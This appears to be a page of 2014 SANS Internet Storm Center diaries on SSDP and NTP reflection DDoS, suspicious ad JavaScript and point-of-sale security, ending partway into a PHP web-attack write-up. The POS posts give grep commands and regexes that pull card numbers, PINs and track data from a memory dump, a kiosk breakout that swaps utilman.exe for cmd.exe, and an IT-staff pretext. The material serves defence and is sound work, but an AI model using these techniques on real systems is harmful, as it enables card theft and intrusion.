Diaries

Published: 2014-08-31

1900/UDP (SSDP) Scanning and DDOS

Over the last few weeks we have detected a significant increase in both scanning for 1900/UDP and a huge increase of 1900/UDP being used for amplified reflective DDOS attacks.  1900/UDP is the Simple Service Discovery Protocol (SSDP) which is a part of Universal Plug and Play (UPnP). The limited information available to me indicates that the majority of the devices that are being used in these DDOS attacks are DLink routers, and some other devices, most likely unpatched or unpatchable and vulnerable to the UPnP flaws announced by HD Moore in January of 2013.

In the corresponding interval we have also seen a significant decrease in Network Time Protocol (NTP) based DDOS.  The big question in my mind is why have the attackers decided to switch from NTP, which has a maximum amplification factor of 600 plus, to SSDP which has an amplification factor of approximately 30.

If anybody has any more information on this, or even better yet, packet captures from one of the devices being used as a reflector, please let me know!

-- Rick Wanner - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

2 Comments

Published: 2014-08-29

False Positive or Not? Difficult to Analyze Javascript

Our reader Travis sent us the following message:

We have had 2 users this morning hit a Forbes page: hxxp://www.forbes.com/sites/jimblasingame/2013/05/07/success-or-achievement/

And then after being referred from there to: hxxp://ml314.com/tag.aspx?2772014

They are setting off our FireEye web appliance. It is advising that this is an "Infection Match" which I am not entirely familiar with their systems determinations as it is fairly new to us. I called down the source of the link they went to and can submit that as well if you would like it, but I haven't had a chance to look at it yet just beautified it and saved it.

I went ahead and downloaded the "ml314.com" URL using wget, and what comes back is heavily obfuscated Javascript. I am just quoting some excerpts of it below:

(function(a){var g=window.document;var h=[];var e=[];var f=(g.readyState=="complete"||g.readyState=="loaded"||g.readyState=="interactive");var d=null;var j=function(k){try{k.apply(this,e)}catch(l){if(d!==null){d.call(this,l)}}};var c=functi...36);F=p(F,D,B,G,E[1],12,-389564586);G=p(G,F,D,B,E[2],17,606105819);B=p(B,G,F,D,E[3],22,-1044525330);D=p(D,B,G,F,E[4],7,-176418897);F=p(F,D,B,G,E[5],12,1200080426);G=p(G,F,D,B,E[6],17,-1473231341);B=p(B,G,F,D,E[7],22,-45705983);D=p(D,B,G,F,E[8],7,1770035416);F=p(F,D,B,G,E[9],12,-1958414417);G=p(G,F,D,B,E[10],17,-42063);B=p(B,G,F,D,E[11],22,-1990404162);D=p(D,B,G,F,E[12],7,1804603682);F=p(F,D,B,G,E[13],12,-40341101);G=p(G,F,D, ... function f(o){o.preventDefault();o.stopPropagation()}function i(o){if(g){return g}if(o.matches){g=o.matches}if(o.webkitMatchesSelector){g=o.webkitMatchesSelector}if(o.mozMatchesSelector){g=o.mozMatchesSelector}if(o.msMatchesSelector){g=o.msMatchesSelector}if(o.oMat ... try{s=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");p=s.GetVariable("$version").substring(4);p=p.split(",");p=p[0]+"."+p[1]}catch(r){}if(s){q="Flash"}return{name:q,version:

In short: Very obfuscated (not just "minimized"), and a lot of keywords that point to detecting plugin versions. Something that you would certainly find in your average exploit kit. But overall, it didn't quite "add up". Not having a ton of time, I ran it through a couple Javascript de-obfuscators without much luck. The domain "ml314.com" also looked a bit "odd", but lets see when it was registered:

$ whois ml314.com​

   Domain Name: ML314.COM
   Name Server: NS.RACKSPACE.COM
   Name Server: NS2.RACKSPACE.COM
   Updated Date: 22-apr-2013
   Creation Date: 22-apr-2013
   Expiration Date: 22-apr-2018

​Admin Organization: Madison Logic
Admin Street: 257 Park Ave South
Admin Street: 5th Floor

The domain name isn't new, and hosted in what I would call a "decent" neighborhood on the Internet. The owner information doesn't look outright fake, and indeed gives us a bit more information to solve the puzzle. Turns out that "Madison Logic" is in the web advertisement / click through business, so what you are seeing is likely their proprietary Javascript to track users better. 

In the end, I call this a "false positive", but then again, feel free to correct me. This is just one example how sometimes things are not simple "black/white" when it comes to odd Javascript.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

3 Comments

Published: 2014-08-27

One More Day of Trolling in POS Memory

Further to the recent story on Memory Trolling for PCI data, I was able to spend one more day fishing in memory, I dug a bit deeper and come up with more fun Credit Card / Memory goodness with our friend the Point of Sale application.

First of all, just searching for credit card numbers returns a lot of duplicates, as indicated in yesterday's story.  In the station and POS application I was working with, it turns out that if you search for the card number string plus the word "Approved", a single line was returned per transaction, with the credit card and PIN.  For instance, to find all Visa card transactions (one record per transaction):

strings memdump.img | grep VISA | grep -i APPROVED  | wc -l         
     323       

In addition, I was able to find several hundred debit card numbers, simply by using those same search concept, but using the term "INTERAC" instead.  Note that this search gets you both the approved and not approved transactions.

strings memdump.img | grep INTERAC | grep -i APPROVED | wc -l
     200

With that done, I started looking at the duplicate data, and realized that some of the duplicate "records" I was tossing out looked interesting - sort of XML-like.   Upon closer inspection, it turns out that they were fully formed MS SQL posts (and no, just as the credit card numbers themselves, I won't be sharing the text of any of those)

Interestingly, the SQL post formatted the credit card numbers as 123456******1234, such that the first 6 and last 4 digits are in clear text,but the middle digits are masked out.  

This lines right up with the PCI 2.0 spec, section 3.3, which indicates that if you mask a PAN (Primary Account Number) that way, it is no longer considered sensitive. (https://www.pcisecuritystandards.org/documents/pci_dss_v2.pdf).  I'm not sure how keen I am on 3.3 -  - I can see that storing this info allows the merchant to use that as a "pseudo customer number", so that they can track repeat purchases and so on, but I'm not sure that the benefits outweigh the risks in this case.   I'd much prefer encrypting on the reader itself, so that the merchant and POS software never sees the card number at all - it's encrypted right from the reader to the payment processor (or gateway).

As I said when I started this, I'm not the expert memory carver that some of our readers are - please, use our comment section and tell us what interesting things you've found in a memory image!

===============
Rob VandenBrink
Metafore

1 Comments

Published: 2014-08-26

Point of Sale Terminal Protection - "Fortress PCI at the Mall"

This is a very broad topic, but over the last few months I've seen some really nicly protected PCI termainls.  Especially since many POS environments are still running Windows XP, this is an important topic to discuss.

Things that I've seen done very well:

First of all, only allow access to the POS app - retail staff generally don't require access to email or the internet, at least not from the sales terminal.  Most POS systems I've seen are running kiosk setups, which removes explorer, the start button and kills all hotkeys.  I'm often able to break out of windows kiosk applications from the keyboard by using a hotkey combination that's been missed.  For instance, Windows+U calls utilman.exe in XP, if you replace utilman with cmd.exe you are in.  Be sure to account for hot-keys!

If you lock down the POS terminals such that a CMD prompt / start menu and so on are not accessible, then the classic "usb rubber ducky" or "teensy" keyboard as a usb key type attack - where you drop a usb key into and exposed port while making a purchase - is that much tougher.  If you can't get a cmd prompt or some field to enter commands, a malicious keyboard attack of this type isn't likely to succeed.

On that same note, use GPO or your endpoint protection product to lock down USB access.  Even if (or maybe especially if) a repair tech needs USB access, inserting a USB device should need a call to head office.

Use network protections:
The local router generally establishes a VPN to head office
The POS terminal should not have internet access
The POS terminal should have only limited access to head office resources (typically a small DMZ for data collection)
Similarly, only required head office resources should have access to the POS terminal
The POS terminal should not  be on the same network as or have access to the rest of the store.  For instance, guest wireless, security cameras, alarm systems and so on should all be in VLANs other than the POS VLAN, and none of those should have access to the POS (and vice versa)

For goodness sake, harden your store's firewall/router, and use a template (that you audit) so that you know that they are all configured correctly!  Hardening guides are available for most platforms, the Center for Internet Security's hardening guide for Cisco is a solid one to use as a guide if your perimeter device doesn't have a vendor supplied document.  Though if your firewall/router vendor doesn't have security guidance, maybe you should look at a different solution ...

If your POS terminal tries to connect to an IP that isn't yours, that's an IOC (Indicator of Compromise) - even a simple DNS query to a "different" server can be a giveaway.  If you see unexplained traffic, it's worth investigating - whitelisting stuff like this to make the alert go away is a BAD IDEA!

Use endpoint protections to your advantage.  That means AV, whitelisting and every other EP feature.  Don't install an AV product and leave it at the defaults, tune it for your POS systems.  While you can certainly circumvent AV using SET, Metasploit, VEIL and so on, that's a moving target.  What might work today to evade one AV vendor might very well not work tomorrow.  PLus you'll find that getting a generic application to evade AV is tough - most of the Metasploit evasion techniques top out at a fairly small memory footprint (4K in a lot of cases)

A distributed IPS is the way to go. With hundreds or in some cases thousands of terminals, you need an IPS local to each terminal to detect IOCs as early in the process as possible.  

Secure your passwords, have a good password policy in the OS, and / or use 2 factor
Don't re-use admin passwords.  If an attacker can get mimikatz on your system, or use procdump to get an lsass memory image, then (on XP), you've likely given up most of the passwords on that system.  Even without that, once you get password hashes, anyone who's serious can use GPUs and crack all the local passwords within a few minutes (or a few days if they have to go with brute force).  
Don't store passwords under the keyboard.  In almost every POS engagement, I can lift up the keyboard and have immediate access.  It's to the point that I include that photo in my reports.  Granted, in most stores getting to the keyboard can be a challenge, but if you show up with a laptop bag and say "I'm with IT, Joe (or whoever the IT Director is) sent me", you'd be surprised how much help you'll get from the sales folks.

Keep on top of current POS malware, especially the IOCs for each (the recent backoff malware is a good example).   This week's alert from the US CERT no the new backoff variants is a good read for instance (https://www.us-cert.gov/ncas/alerts/TA14-212A).  The copious amount of discussion on the Target breach (and the associated BlackPOS malware) is another place to look.

Each of these protections in themselves can be circumvented.  But the more you layer on, the better  The harder you make your attacker work to penetrate your environment, the more likely they will target someone else.  Your goal is to make things as difficult for the attacker as possible, to force them to make as much "noise" - ie generate as many alarms- as possible as they work their way in, to give you a chance at blocking them at one point or another

This is just a start at protecting a POS system or netowrk.  This is meant as the start of a disucssion - I'd be very interested to know what else folks are doing to secure their terminals.  Please use our comment form to share your approaches!

==============
Rob VandenBrink, Metafore

8 Comments

Published: 2014-08-26

Trolling Memory for Credit Cards in POS / PCI Environments

In a recent penetration test, I was able to parlay a network oversight into access to a point of sale terminal.  Given the discussions these days, the next step for me was an obvious one - memory analysis.

My first step was to drive to the store I had compromised and purchase an item.

I'm not a memory analysis guru, but the memory capture and analysis was surprisingly easy.  First, dump memory:
dumpit
Yup, it's that simple, I had the dumpit executable locally by that point (more info here https://isc.sans.edu/diary/Acquiring+Memory+Images+with+Dumpit/17216)
or, if you don't have keyboard access (dumpit requires a physical "enter" key, I/O redirection won't work for this):
win32dd /f memdump.img
(from the SANS Forensics Cheat Sheet at https://blogs.sans.org/computer-forensics/files/2012/04/Memory-Forensics-Cheat-Sheet-v1_2.pdf )

Next, I'll dig for my credit card number specifically:

strings memdump.img | grep [mycardnumbergoeshere] | wc -l
     171

Yup, that's 171 occurences in memory, unencrypted.  So far, we're still PCI complaint - PCI 2.0 doesn't mention cardholder data in memory, and 3.0 only mentions it in passing.  The PCI standard mainly cares about data at rest - which to most auditors means "on disk or in database", or data in transit - which means on the wire, capturable by tcpdump or wireshark.  Anything in memory, no matter how much of a target in today's malware landscape, is not an impact on PCI compliance.

The search above was done in windows, using strings from SysInternals - by default this detects strings in both ASCII and Unicode.  If I repeat this in linux (which by default is ASCII only), the results change:
strings memdump.img | grep [mycardnumbergoeshere] | wc -l
     32

To get the rest of the occurences, I also need to search for the Unicode representations,  which "strings" calls out as "little-endian" numbers:
strings -el memdump.img | grep [mycardnumbergoeshere] | wc -l
     139

Which gives me the same total of 171.

Back over to windows, let's dig a little deeper - how about my CC number and my name tied together?
strings memdump.img | grep [myccnumbergoeshere] | grep -i vandenbrink | wc -l
     1

or my CC number plus my PIN  (we're CHIP+PIN in Canada)
strings memdump.img | grep [mycardnumbergoeshere] | grep [myPINnumber]
     12

Why exactly the POS needs my PIN is beyond me!

Next, let's search this image for a number of *other* credit cards - rather than dig by number, I'll search for issuer name so there's no mistake.  These searches are all using the Sysinternals "strings" since the defaults for that command lend itself better to our search:

CAPITAL ONE       85
VISA             565
MASTERCARD      1335
AMERICAN EXPRESS  20

and for kicks, I also searched for debit card prefixes (I only search for a couple with longer IIN numbers):
Bank of Montreal   500766     245
TD CAnada Trust    589297    165

Looking for my number + my CC issuer in the same line gives me:
strings memdump.img | grep [myccnumbergoeshere] | grep [MASTERCARD] | wc -l
gives me a result of "5"

So, assuming that this holds true for others (it might not, even though the patterns are all divisible by 5), this POS terminal has hundreds, but more likely thousands of valid numbers in memory, along with names, PIN numbers and other informaiton

Finally, looking for a full magstripe in memory:

The search for a full stripe:
grep -aoE "(((%?[Bb]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}\/[A-Za-z\s]{0,26}\^(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)[;\s]{1,3}([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?))" memdump.img  | wc -l
    0

where:

    -a = Processes a binary file as text
    -o = Shows only the matched text
    -E = Treats the pattern as an extended regular expression

or using this regex to find Track strings only:

((%?[Bb]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}\/[A-Za-z\s]{0,26}\^(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)
gives us 0 results.

or this regex to find Track 2 strings only:

([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?)  
Gives us 162  (I'm not sure how much I trust this number)

Anyway, what this tells me is that this store isn't seeing very many folks swipe their cards, it's all CHIP+PIN (which you'd expect)

(Thanks to the folks at bromium for the original regular expressions and breakdown: http://labs.bromium.com/2014/01/13/understanding-malware-targeting-point-of-sale-systems/)

Getting system uptime (from the system itself) wraps up this simple analysis - the point of this being "how long does it take to collect this much info?"

net statistics server | find "since""
shows us that we had been up for just under 4 days.

Other ways to find uptime?
from the CLI:
systeminfo " find "Boot Time"
or, in powershell:
PS C:\> Get-WmiObject win32_operatingsystem | select csname, @{LABEL='LastBootUpTime';EXPRESSION={$_.ConverttoDateTime($_.lastbootuptime)}}
or, in wmic:
wmic get os last bootuptime
or, if you have sysinternals available, you can just run "uptime"


What does this mean for folks concerned with PCI compliance?
Today, not so much.  Lots of environments are still operating under PCI 2.0.  PCI 3.0 simply calls for education on the topic of good coding practices to combat memory scraping.  Requirement 6.5 phrases this as "Train developers in secure coding techniques, including how to avoid common coding vulnerabilities, and understanding how sensitive data is handled in memory.  Develop applications based on secure coding guidelines."

Personally (and this is just my opinion), I would expect/hope that the next version of PCI will call out encryption of card and personal information in memory specifically as a requirement.  If things play out that way, What this will mean to the industry is that either:
a/ folks will need to move to card readers that encrypt before the information is on the POS terminal
or
b/ if they are using this info to collect sales / demographic information, they might instead tokenize the CC data for the database, and scrub it from memory immediately after.  All  I can say to that approach is "good luck".  Memory management is usually abstracted from the programming language, so I'm not sure how successful you'd be in trying to scrub artifacts of this type from memory.

===============
Rob VandenBrink, Metafore

4 Comments

Published: 2014-08-25

UDP port 1900 DDoS traffic

I guess this is my day for asking for feedback from our readers.  Again, I'm going to ask "Got packets?"  On 22 Aug, one of our readers (Paul) commented on the Port 1900 page that he was seeing a DDoS on port 1900, with packet sizes of 300 bytes.  This is a development we've been watching at $dayjob, too, but I was wondering if anyone (including Paul) has packets so we can try to figure out what the amplification mechanism might actually be (if you have the packets, please share via the contact page).  What we're seeing in Dshield data is a little odd and different from what I'm seeing at $dayjob.  You'll note below that there were a more targets until they suddenly dropped off on 18 Jun.  On the other hand, the sources seem to be trending upward (at least, peaking higher).  Unfortunately, we only have source and target counts in the Dshield data, not byte volumes.  Compare that with what we're seeing at the $dayjob as shown in the webcast we do weekly there (from 39:55 in this video -- watch to about 47:00 if you want to see our discussion of all the reflective DoS ports we're watching).

References:
[1] https://isc.sans.edu/port.html?port=1900
[2] http://techchannel.att.com/play-video.cfm/2014/8/14/AT&T-ThreatTraq-1-Billion-Accounts-Hacked

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

6 Comments

Published: 2014-08-25

Unusual CRL traffic?

One of our readers, Brian, wrote in this morning saying that he was seeing an unusually high volume of traffic attempting to check certificate revocation lists (CRLs) from lots of different IPs (so it doesn't look like a denial of service attack, there are lots of both sources and destinations).  I haven't heard of anything that going on that would cause this behavior, but thought I'd ask our readers if they were seeing anything similar.  Could a patch have caused it?  Microsoft did patch IE 10 days ago, but that would be quite a lag time.  If anyone else is seeing this and could grab a sample of the traffic (so we could look at User-Agents, etc.) please respond below or through our contact page.  Thanx in advance for your assistance.

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

2 Comments

Published: 2014-08-23

NSS Labs Cyber Resilience Report

Bob Walder and Chris Morales of NSS Labs published an interesting brief. Based on last year IPS, firewall and endpoint protection tests, the effectiveness of the best device scored was 98.5%. While this is considered excellent, there is still ~2 percent of attacks that make it through the perimeter and host layer defences. Two of their proposals is to attempt to control the attacker by redirecting the attack against a target you can watch and control (i.e. tarpit the attacker) and to regularly test your network to detect problems before someone else does and exploit that system.

They have listed several recommendations but one that I think is worth focussing is be "Prepare to operate at 60 percent capacity in order to withstand a breach, which will reduce, but not eliminate, critical services." [1]

It is very likely the impact will be affecting users, customers and business. Who is prepared to continue to operate at 60% capacity without affecting business or the bottom line?

The eleven page report can be downloaded here.

[1] https://www.nsslabs.com/system/files/public-report/files/Cyber%20Resilience_0.pdf
[2] https://www.nsslabs.com/blog/cyber-resilience-%E2%80%93-it%E2%80%99s-not-98-you-catch-matters-it%E2%80%99s-2-you-miss

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

1 Comments

Published: 2014-08-22

OCLHashCat 1.30 Released

For those of us who are using GPUs to turn hashes into passwords and other useful info, the folks at hashcat.net have released a new version of OCLHashCat.

What's new?
Performance increases in almost every algorithm

New hashing algorithms:
md5($salt.md5($pass))  (added just for  Mediawiki B)
Mediawiki B type
Kerberos 5 AS-REQ Pre-Auth etype 23 as fast algorithm (reimplementation)
Android FDE
scrypt
Password Safe v2
Lotus Notes/Domino 8

New parsers
Skype
PeopleSoft

Full release notes here: https://hashcat.net/forum/thread-3627.html
Download here:  http://hashcat.net/oclhashcat/

Posted on Behalf of Rob.

~Richard

--Handler on Duty

0 Comments

Published: 2014-08-21

Now supporting OpenIOC via our API!

The SANS Internet Storm Center is proud to announce the release of our first OpenIOC format API call. We have been hard at work writing a method that serves our firewall logs as OpenIOC XML content dynamically from a RESTful HTTP request. This is a critical step in expanding our service offerings to you, our readers, members and contributors.
 
You can use tools that ISC handler Russ McRee mentioned in a previous diary to convert output from this new method into STIX format. This is just the beginning however; the development roadmap includes the addition of another API method with the same data served in STIX format!
 
Ready to get started? View the documentation here: https://isc.sans.edu/api/#openiocsources
 
Please share your feedback as well as use cases and success stories as they unfold in the comments below.
 
A big thanks to Russ McRee for his assistance with testing and the writing of this announcement!

-- 
Alex Stanford - GIAC GWEB & GSEC
Research Operations Manager,
SANS Internet Storm Center

0 Comments

Published: 2014-08-20

Social Engineering Alive and Well

The muse for this diary is far from hot off the press. Many of you may have already come across the click through scam on Facebook reporting a video recording taken of Robin Williams moments before his death.  

In case you had not heard, Robin Williams is a popular American movie actor and entertainer that recently took his own life at the young age of 63.  The general public's open expression of grief for his passing has given some evil doers an opening to take advantage of human emotion.

Snopes.com has a write up on this scam. [1]   I can offer a couple of details on it.    
An image like this one will show up in your Facebook feed enticing you to click to view the video of Robin Williams.



Once the link is clicked, it will bait again the user to fill out a survey and provide some information. (PII)
The following image is the next step.


 

By clicking through this type of scam it opens a list of vectors for the user to be exploited. So please beware, educate your family, friends, and co-workers.

Let this also be a wake up call for other soft spots.  The ALS Ice Bucket challenge is viral marketing success, that could easily be exploited. So don't always trust and feel the need to meet your curiosity.

Safe clicking.

 
[1] http://www.snopes.com/computer/facebook/robinwilliams.asp

 

1 Comments

Published: 2014-08-17

Part 2: Is your home network unwittingly contributing to NTP DDOS attacks?

This diary follows from Part 1, published on Sunday August 17, 2014.  

How is it possible that with no port forwarding enabled through the firewall that Internet originated NTP requests were getting past the firewall to the misconfigured NTP server?

The reason why these packets are passing the firewall is because the manufacturer of the gateway router, in this case Pace, implemented full-cone NAT as an alternative to UPnP.

What is full-cone NAT?

The secret is in these settings in the gateway router:

If strict UDP Session Control were enabled the firewall would treat outbound UDP transactions as I described earlier.  When a device on your network initiates an outbound connection to a server responses from that server are permitted back into your network.  Since UDP is stateless most firewalls simulate state with a timeout.  In other words if no traffic is seen between the device and the server for 600 seconds then don’t permit any response from the server until there is new outbound traffic. But anytime related traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate. Visually that looks like:

However if UDP Session Control is disabled, as it is in this device, then this device implements full-cone NAT (RFC 3489). Full-cone NAT allows any external host to use the inbound window opened by the outbound traffic until the timer expires.  

Remember anytime traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate.

The really quick among you will have realized that this is not normally a big problem since the only port exposed is the original ephemeral source port and it is waiting for a NTP reply.  It is not likely to be used as an NTP reflector.  But the design of the NTP protocol can contribute to this problem.

Symmetric Mode NTP

There is a mode of NTP called symmetric NTP in which, instead of the originating device picking an ephemeral port for the outbound connection,  both the source and the destination ports use 123. The traffic flow would look like:

Symmetric NTP opens up the misconfigured server to be an NTP reflector.  Assuming there is an NTP server running on the originating machine on UDP port 123, if an attacker can find this open NTP port before the timeout window closes they can send in NTP queries which will pass the firewall and will be answered by the NTP server.  If the source IP address is spoofed the replies will not go back to the attacker, but will go to a victim instead. 

Of course UDP is stateless so the source IP can be spoofed and there is no way for the receiver of the NTP request to validate the source IP or source port permitting the attacker to direct the attack against any IP and port on the Internet.  It is exceedingly difficult to trace these attacks back to the source so the misconfigured server behind the full-cone NAT will get the blame. As long as the attacker sends at least one packet every 600 seconds he can hold the session open virtually forever and use this device to wreak havoc on unsuspecting victims. We have seen indications of the attackers holding holding these communications open for months.  

What are the lessons to be learned here:

  • If all ISPs fully implemented anti-spoofing filters then the likelihood of this sort of attack is lowered substantially.  In a nutshell anti-spoofing says that if the traffic is headed into my network and the source IP address is from my network then the source IP must be spoofed, so drop the packet.  It also works in the converse.  If a packet is leaving my network and the source IP address is not an IP address from my network then the source IP address must be spoofed, so drop the packet.
  • It can't hurt to check your network for NTP servers.  A single nmap command will quickly confirm if any are open on your network. nmap -sU  -A -n -PN -pU:123 --script=ntp-monlist .  If you find one or more perhaps you can contact the vendor for possible resolution.
  • If you own a gateway router that implements full-cone NAT you may want to see if your gateway router implements the equivalent of  the Pace “Strict UDP Session Control”.  This will prevent an attacker from access misconfigured UDP servers on your network. 

-- Rick Wanner - rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

1 Comments

Published: 2014-08-17

Part 1: Is your home network unwittingly contributing to NTP DDOS attacks?

For the last year or so, I have been investigating UDP DDOS attacks. In this diary I would like to spotlight a somewhat surprising scenario where a manufacturer’s misconfiguration on a popular consumer device combined with a design decision in a home gateway router may make you an unwitting accomplice in amplified NTP reflection DDOS attacks.

This is part 1 of the story.  I will publish the conclusion Tuesday August 19th.

Background

Today almost every house has consumer broadband services.  Typical broadband installations will have a device, usually provided by your service provider, which acts as a modem, a router and a firewall (for the rest of the diary this device will be called a gateway router).   In a nutshell the firewall in the gateway router permits network traffic initiated on your network out to the Internet, and permits responses to that traffic back into your network.  Most importantly the firewall will block all traffic destined for your network which is not a response to traffic initiated from your network.  This level of firewall capability meets the requirements of almost all broadband consumers on the Internet today.   

For those of us power users who required more capability, gateway router manufacturers tended to support a port forwarding feature that would allow us to accommodate servers and other devices behind the firewall.  This was great for us tech-savvy folk, but typically port forwarding was beyond the understanding of the average Internet user like my Dad (sorry Dad!) or my Grandma.

In the last few years consumer devices that plug into your home network and use more complicated networking, that does not fit the standard initiate-respond model, have become more common.  The most common of those is gaming consoles, but other devices like home automation, storage devices and others can also be an issue.  As stated above setting up port forwarding so these devices will function properly is beyond the average Internet users’ capability.  Luckily the gateway router vendors have thought of that as well. 

To simplify connecting these devices, gateway router vendors tend to implement one of two ways of supporting these devices.  Most support Universal Plug and Play (UPnP) with a minority of  vendors supporting Full-cone NAT.  

Investigation

It begins with a complaint from a reputable source that a customer is participating in a reflective NTP DDOS attack utilizing monlist for amplification.

The complaint is against XXX.160.28.174, a dynamic address broadband customer.  The analyst’s first thought is that this is a tech-savvy user has setup a NTP server and added port forwarding to their router.  It should be easy to resolve. Contact the customer and tell him to patch his NTP server to the current version and everything will be great!  Unfortunately, this is where things go sideways.

While network monitoring clearly shows this customer’s connection participating in a NTP DDOS attack:

Review of the firewall configuration showed that there are no ports forwarded on the firewall.

But the NAT logs in the firewall show a large number of outbound connections to various addresses originating from this device and most of them don’t appear to be to NTP servers. 

172.16.1.64:123, f: 192.75.12.11:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 199.182.221.110:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 142.137.247.109:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 129.128.5.211:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 206.108.0.132:123, n: XXX.160.28.174:123
172.16.1.64:123, f: 94.185.82.194:443, n: XXX.160.28.174:123
172.16.1.64:123, f: 60.226.113.100:80, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:24572, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:38553, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:24572, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:47782, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:53177, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:43397, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:15673, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:17275, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:63467, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:56970, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:64682, n: XXX.160.28.174:123
172.16.1.64:123, f: 204.83.20.117:26332, n: XXX.160.28.174:123
172.16.1.64:123, f: 101.166.182.210:80, n: XXX.160.28.174:123

According to the NAT table, the address behind the gateway router that is initiating the outbound UDP sessions is at 172.16.1.64. The device table shows it as:

Name: home-controller-300-000FFF13C150
Hardware Address: 00:0f:ff:13:c1:50

That MAC address is owned by a company called Control4 who makes popular home automation devices. It is clear that the Control4 device has a configuration problem.  There is likely no reason for Control4 to be running an NTP server on a home automation device, and certainly that NTP server should not support the monlist command. Most likely this a result of the Linux/Unix difficulty that when you implement an NTP client on a *nix platform you almost always wind up with an NTP server getting enabled as well which you need to manually disable. Either way, I was in contact with Control4, and they were aware of the issue and have released a patch and any Control4 devices that call home to the mothership should be resolved.  Unfortunately they have a significant number of devices that, for some reason, don't call home and can't be patched until they do.  But this is not just a Control4 problem.  In the course of my investigation I found Macintosh computers, FreeNAS devices, Dell Servers and Dlink Storage devices displaying the same behavior. But even if there is a misconfigured NTP server on these networks, if the firewall is working properly, then no uninitiated connections should be permitted into these, and these devices should not be capable of being used as a reflector.

An nmap scan shows that not only is it possible to connect through the firewall, but that there is clearly an NTP server answering queries and that permits the monlist command, maximizing the amplification.

123/udp open          ntp     NTP v4

| ntp-monlist: 

|   Target is synchronised with 206.108.0.133

|   Alternative Target Interfaces:

|       172.16.1.64     

|   Public Servers (4)

|       142.137.247.109 174.142.10.100  198.27.76.239   206.108.0.133   

|   Other Associations (166)

|       24.220.174.96 seen 7615 times. last tx was unicast v2 mode 7

|       193.25.121.1 seen 2084 times. last tx was unicast v2 mode 7

|       66.26.0.192 seen 406 times. last tx was unicast v2 mode 7

|       109.200.131.2 seen 11079 times. last tx was unicast v2 mode 7

|       79.88.149.109 seen 15356 times. last tx was unicast v2 mode 7

|       66.176.8.42 seen 90397 times. last tx was unicast v2 mode 7

|       84.227.75.171 seen 58970 times. last tx was unicast v2 mode 7

|       82.35.229.219 seen 952 times. last tx was unicast v2 mode 7

|       96.20.156.186 seen 2123 times. last tx was unicast v2 mode 7

|       216.188.239.159 seen 178 times. last tx was unicast v2 mode 7

|       184.171.166.72 seen 923 times. last tx was unicast v2 mode 7

|       94.23.230.186 seen 96 times. last tx was unicast v2 mode 7

… total of 166 entries

 

This is where I will end the story for now. What do you think is happening?  Conclusion Tuesday August 19th.

-- Rick Wanner - rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

2 Comments

Published: 2014-08-16

Issues with Microsoft Updates

Microsoft has updated some bulletins because there are three known issues that can affect your computer.

  • when KB2982791 is installed, fonts that are installed in a location other than the default fonts directory (%windir%\fonts\) cannot be changed when they are loaded into any active session
  • Fonts do not render correctly after any of the following updates are installed:
    • 2982791 MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
    • 2970228 Update to support the new currency symbol for the Russian ruble in Windows
    • 2975719 August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
    • 2975331 August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012
  • Microsoft is investigating behavior in which systems may crash with a 0x50 Stop error message (bugcheck) after any of the following updates are installed:
    • 2982791 MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
    • 2970228 Update to support the new currency symbol for the Russian ruble in Windows
    • 2975719 August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
    • 2975331 August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012

If you have not installed yet those updates, please don't install it until Microsoft pubish a fix. If you already installed it, please check each article for mitigation measures.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

9 Comments

Published: 2014-08-16

Web Server Attack Investigation - Installing a Bot and Reverse Shell via a PHP Vulnerability

With Windows malware getting so much attention nowadays, it's easy to forget that attackers also target other OS platforms. Let's take a look at a recent attempt to install an IRC bot written in Perl by exploiting a vulnerability in PHP.

The Initial Probe

The web server received the initial probe from 46.41.128.231, an IP address that at the time was not flagged as malicious on various blocklists:

HEAD / HTTP/1.0

The connection lacked the headers typically present in an HTTP request, which is why the web server's firewall blocked it with the 403 Forbidden HTTP status code error. However, that response was sufficient for the attacker's tool to confirm that it located a web server.

The Exploitation Attempt

